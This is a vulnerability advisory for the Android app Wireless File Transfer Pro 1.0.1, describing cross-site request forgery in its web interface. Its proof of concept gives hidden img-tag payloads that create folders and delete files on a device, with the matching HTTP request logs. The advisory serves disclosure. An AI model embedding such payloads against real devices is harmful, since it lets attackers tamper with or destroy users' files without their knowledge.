Wireless File Transfer Pro Android Cross Site Request Forgery Vulnerability

Document Title:
===============
Wireless File Transfer Pro Android - CSRF Vulnerabilities


Common Vulnerability Scoring System:
====================================
2.3


Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.

(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application.


Vulnerability Disclosure Timeline:
==================================
2015-02-25:  Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Lextel Technology  
Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1 


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple cross site request forgery issues has been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Create New Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4

<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">


Delete File, Folder

<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0">

--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive

HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30

Reference:
http://localhost:8888/


Security Risk:
==============
The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3)

#  0day.today [2018-01-02]  #